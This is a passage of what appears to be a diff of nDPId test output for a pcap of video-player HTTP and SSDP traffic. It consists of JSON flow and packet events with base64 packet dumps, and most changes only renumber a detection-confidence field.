DnltN\/+kP2qhoa5r1DcSUAZq6JPm51\/USDg6qO4x\/Vapf6ZVCWehE+KdgGpX4qBTKeA+bV7qois7qvnsCmBXUWPo21DtRYTVMizQCWWQqH0CGGSEtoZ24ZE8Em+sX59yNgKKKnBzY4rxhy1pF8qyBkoHpDm9lBx3JEleYOnrbk5vilJTiHsG0C7im31hM5hXvKl2rEhKIpc+QgsAwc8xEkz7398lWjZRYNmVmvhEG3GTaIjL7zuDYVBFnz\/Ep+CquTSroYI\/KVwc+2ze3Q+yBDcODi+bFdRr\/qJ\/RfL4FgeDb9sduAkPb3xQiixfjLzyzTazf6dzG3+S06aSi8zpu2nZ2pA6Ukh\/FodlR311cw8YfsxYuiSFyYqZDzpce1Qm0XZXnys8qlDnUmjILug1tlJBa1UzH74juRDwgD0Fnwh1MLjNAsmUIrgA0GSsiEjUBU047yfXV\/qzyvQus+1BXKIiklyV0Xin7L0ua0Yj38t6gGn+ytwXAmSh71WYg7o3suhEh2DpzfHKZ9IBKf8gIvOvhTvSepAfXGEaca4phlMY6YIuwsde9HzRk9q6m3wLv6MKf1l9nyMKAHgaDMdK68E7LAU50IjtX2yCF8K"} -01059{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1055,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353157138,"flow_last_seen":1467353157142,"flow_idle_time":7580000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2892,"flow_avg_l4_payload_len":964,"midstream":1,"thread_ts_msec":1467353157142,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
+01059{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1055,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353157138,"flow_last_seen":1467353157142,"flow_idle_time":7580000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2892,"flow_avg_l4_payload_len":964,"midstream":1,"thread_ts_msec":1467353157142,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7580000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"thread_ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1467353157433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":389,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":389,"pkt_l4_len":355,"thread_ts_msec":1467353157433,"pkt":"TF4M6gNlABxCjnAxCABFAAF3D2lAAIAGOZbAqHMIb84NA8U8AFD\/xaF06zAEllAYAQRGTAAAR0VUIC8yZWZjOGNkNWZiZTBmNGVlNDk4ZmIxYzJmYzFkZThiNi92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P3F5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiBIVFRQLzEuMQ0KSG9zdDogcGRhdGEudmlkZW8ucWl5aS5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBIQ0ROQ2xpZW50X1dJTlBDO2xpYmN1cmwvNy4yNi4wIE9wZW5TU0wvMS4wLjFnIHpsaWIvMS4yLjU7UUsvMTAuMC4wLjI5Mw0KDQo="} -00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7580000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"thread_ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}} 
+00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1080,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157433,"flow_last_seen":1467353157433,"flow_idle_time":7580000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":335,"flow_avg_l4_payload_len":335,"midstream":1,"thread_ts_msec":1467353157433,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1467353157468,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353157468,"pkt":"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"} -01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353157046&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
+01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157468,"flow_last_seen":1467353157468,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353157468,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353157046&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1467353157475,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":517,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":517,"pkt_l4_len":483,"thread_ts_msec":1467353157475,"pkt":"ABxCjnAxTF4M6gNlCABFAAH3iDRAADMGDUtvzg0DwKhzCABQxTzrMASW\/8Wiw1AYAB\/SLQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjkwDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJnF5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiZ1dWlkPTc2YTMwODVhLTU3NzYwODQ0LThiIiwiZSI6IjAifQ=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7580000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"thread_ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00992{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1467353157509,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":457,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":457,"pkt_l4_len":423,"thread_ts_msec":1467353157509,"pkt":"TF4M6gNlABxCjnAxCABFAAG7D3xAAIAGbLPAqHMI3xpqQsU+AFB482xgj\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"} -01136{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7580000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"thread_ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012&uuid=76a3085a-57760844-8b","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}} 
+01136{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1083,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157509,"flow_last_seen":1467353157509,"flow_idle_time":7580000,"flow_min_l4_payload_len":403,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":403,"flow_avg_l4_payload_len":403,"midstream":1,"thread_ts_msec":1467353157509,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&qyid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&qypid=2012&uuid=76a3085a-57760844-8b","code":0,"content_type":"","user_agent":"HCDNClient_WINPC;libcurl\/7.26.0 OpenSSL\/1.0.1g zlib\/1.2.5;QK\/10.0.0.293"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1084,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1467353157533,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353157533,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5zsFAADMGa3TKbA7swKhzCABQxT0x8BrOPOASCFAYACB8+QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1467353157718,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":517,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":517,"pkt_l4_len":483,"thread_ts_msec":1467353157718,"pkt":"ABxCjnAxTF4M6gNlCABFAAH3iDVAADMGDUpvzg0DwKhzCABQxTzrMASW\/8Wiw1AYAB\/SLQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjkwDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJnF5aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcXlwaWQ9MjAxMiZ1dWlkPTc2YTMwODVhLTU3NzYwODQ0LThiIiwiZSI6IjAifQ=="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1086,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1467353158696,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353158696,"pkt":"AQBef\/\/6GF4PUugBCABFAAChLHIAAAER1v7AqAU57\/\/\/+ukAB2wAjbKhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1467353159222,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1467353159222,"pkt":"TF4M6gNlKDc3Alz6CABFAAE1+vRAAEAGNqjAqAUPROn9hf5nAFAhJnFt6cGPtIAYEBWfeAAAAQEICiYbloUrIzeaR0VUIC9jb21NYWdpY2FuQXBpL2luZGV4LnBocC9Ub29sQm94L3ZlcnNpb24gSFRUUC8xLjENCkhvc3Q6IGFwaS5tYWdpY2Fuc29mdC5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLXR3DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1hZ2ljYW4gKHVua25vd24gdmVyc2lvbikgQ0ZOZXR3b3JrLzcyMC41LjcgRGFyd2luLzE0LjUuMCAoeDg2XzY0KQ0KDQo="} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/index.php\/ToolBox\/version","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1087,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353159222,"flow_last_seen":1467353159222,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353159222,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/index.php\/ToolBox\/version","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} 
00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1467353159428,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":390,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":390,"pkt_l4_len":356,"thread_ts_msec":1467353159428,"pkt":"KDc3Alz6TF4M6gNlCABFAAF4t91AADUGhHxE6f2FwKgFDwBQ\/mfpwY+0ISZyboAYABs\/NQAAAQEICisjOHomG5aFSFRUUC8xLjEgNTAyIEJhZCBHYXRld2F5DQpTZXJ2ZXI6IE1TZXJ2ZXIgMS4yLjINCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDU6NDY6MjUgR01UDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbA0KQ29udGVudC1MZW5ndGg6IDE2Ng0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KDQo8aHRtbD4NCjxoZWFkPjx0aXRsZT41MDIgQmFkIEdhdGV3YXk8L3RpdGxlPjwvaGVhZD4NCjxib2R5IGJnY29sb3I9IndoaXRlIj4NCjxjZW50ZXI+PGgxPjUwMiBCYWQgR2F0ZXdheTwvaDE+PC9jZW50ZXI+DQo8aHI+PGNlbnRlcj5uZ2lueDwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg0K"} 00955{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1467353159731,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":430,"pkt_l4_len":396,"thread_ts_msec":1467353159731,"pkt":"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"} 
00971{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1467353159746,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":443,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":443,"pkt_l4_len":409,"thread_ts_msec":1467353159746,"pkt":"ABxCjnAxTF4M6gNlCABFAAGtzXdAADgG9sXfGmpCwKhzCABQxT6QPm1nePNva1AYACEkXQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU5IEdNVA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkNvbnRlbnQtTGVuZ3RoOiA3Mg0KTGFzdC1Nb2RpZmllZDogU2F0LCAyNSBKdW4gMjAxNiAyMDo0Nzo0OCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkVUYWc6ICI1NzZlZWRmNC00OCINCkV4cGlyZXM6IFNhdCwgMDEgSnVsIDIwMTcgMDY6MDU6NTkgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQoBAAAAjem7lGlyqIWJ0WZ4YikhMAAAAADA8HoAAAAAAJ0fBgCdHwYAAAAgAABAAACfagIAEAAAABkBmvdUqrt6QK4cKbQBDrk="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353160157,"flow_last_seen":1467353160157,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353160157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1467353160157,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353160157,"pkt":"AQBef\/\/6bEAIlAI6CABFAAClHaUAAAER5dDAqAUw7\/\/\/+vm6B2wAkVW0TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 